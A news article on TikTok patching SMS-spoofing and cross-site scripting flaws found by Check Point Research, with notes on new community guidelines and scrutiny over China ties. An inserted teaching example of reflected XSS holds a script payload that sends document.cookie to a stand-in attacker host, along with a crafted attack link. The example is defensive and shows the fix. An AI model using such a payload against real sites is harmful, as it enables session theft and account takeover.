TikTok Addresses 'Multiple' Security Flaws Found by Cyber Intelligence Firm


The video-sharing app has also issued new community guidelines for its users.

In what is seemingly the latest effort to allay concerns over its security vulnerabilities, the hugely popular video-sharing app TikTok has revealed new measures to ensure the safety of its users.

According to a Wednesday (Jan. 8) press release, the company has patched “multiple” previously unknown security flaws discovered on its platform by Check Point Research, the threat intelligence arm of cyber security firm Check Point Software Technologies. The firm's research found that the flaws let an attacker send spoofed SMS messages (messages that appear to come from TikTok) containing malicious links to TikTok users; if a user tapped one of those links, the attacker could manipulate that user's account, making private videos public and even uploading unauthorized content.

Check Point's research also found that the company's TikTok Ads subdomain was vulnerable to cross-site scripting (XSS), an attack in which an attacker's script is injected into a trusted website and runs in victims' browsers with that site's privileges; in this case it gave attackers access to users’ confidential personal information, including email addresses and birth dates.
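To show what the attack class above looks like in code, here is an added example of a reflected XSS bug beside its fix. It is illustrative only, written for this page: it is not the TikTok Ads flaw itself (the article gives no details of that bug) and not TikTok's or Check Point's code. The hostname, the `q` parameter, the page template and the payload are all assumptions made for the demonstration.

```javascript
// Added example: reflected XSS and its fix. Not the TikTok Ads bug, whose details
// the article does not give; hostnames, parameter names and payload are assumed.

// Vulnerable: untrusted query input is concatenated straight into HTML, so any
// markup the attacker places in the link is rendered and executed by the browser.
function renderSearchPageVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Fix: encode the characters HTML treats specially before interpolating text
// into markup. The browser then shows the payload as literal text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderSearchPageSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Pull the reflected parameter out of a link the way a server handler would.
function queryFromLink(link) {
  return new URL(link).searchParams.get("q") ?? "";
}

// Constructed payload: script that, if it runs inside the site's origin, can read
// same-origin data (profile fields, non-HttpOnly cookies) and send it elsewhere.
// "attacker.invalid" is a reserved non-resolving name used only for illustration.
const PAYLOAD =
  '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>';

// The link an attacker would deliver to a victim (e.g. in a spoofed SMS).
const ATTACK_LINK =
  "https://ads.example.invalid/search?q=" + encodeURIComponent(PAYLOAD);

// Simple check for the demonstration: is an unencoded script tag still present?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

const q = queryFromLink(ATTACK_LINK);
console.log("vulnerable renders script:", containsScriptTag(renderSearchPageVulnerable(q)));
console.log("fixed renders script:     ", containsScriptTag(renderSearchPageSafe(q)));
```

Output encoding is the fix for this bug class; a Content-Security-Policy that disallows inline script and marking session cookies HttpOnly limit the damage when an encoding is missed somewhere else.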

The press release notes that since Check Point first made TikTok aware of these vulnerabilities, the company has “responsibly deployed” a fix to keep user accounts safe.

“TikTok is committed to protecting user data,” TikTok security engineer Luke Deshotels said in a statement. “Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us. Before public disclosure, CheckPoint agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.”

“Data is pervasive but data breaches are becoming an epidemic, and our latest research shows that the most popular apps are still at risk,” added Oded Vanunu, Check Point’s head of product vulnerability research. “Social media applications are highly targeted for vulnerabilities as they provide a good source for private data and offer a good attack surface gate. Malicious actors are spending large amounts of money and putting in great effort to penetrate into such huge applications. Yet most users are under the assumption that they are protected by the app they are using.”

Also revealed Wednesday were extensive new community guidelines for TikTok users laying out what constitutes acceptable content on the platform. Among other things, the latest guidelines ban terrorist and hate groups; “violent and graphic” content; hate speech; harassment and bullying; pornography; predatory or grooming behavior toward minors; the trafficking of drugs and firearms; fraud; and blackmail. (TikTok tells Billboard the new guidelines are unrelated to the Check Point study.) 

According to the updated guidelines, TikTok will remove content it finds to be in violation and suspend or ban accounts involved in severe or repeated violations, while also reporting users to legal authorities “under certain circumstances.” It additionally lists exceptions for content that, while it would ordinarily be removed, “could have value to the public.”

TikTok has been weathering multiple controversies over the last several months, including scrutiny over its parent company ByteDance’s relationship with the Communist Party-run Chinese government. The app is now reportedly the subject of an inquiry by the Interagency Committee on Foreign Investment in the U.S. (CFIUS) over its 2017 acquisition of the U.S.-based video-sharing app Musical.ly, which was folded into TikTok in August 2018.

In a statement sent to Billboard at the time the inquiry was reported, a TikTok spokesperson responded, “While we cannot comment on ongoing regulatory processes, TikTok has made clear that we have no higher priority than earning the trust of users and regulators in the US. Part of that effort includes working with Congress and we are committed to doing so.”

Last week, TikTok released its first-ever transparency report, listing requests it had received from foreign countries for user data and content removal in the first six months of 2019. The move was widely seen as a way for the company to combat suspicions around its alleged relationship with China, which some have suspected of censoring TikTok content related to pro-democracy protests in Hong Kong (China appeared nowhere in the report). In October, TikTok denied that China held any sway over its platform, stating, "We have never been asked by the Chinese government to remove any content and we would not do so if asked. Period."

TikTok currently boasts over one billion users worldwide and is available in over 150 markets and 75 languages.
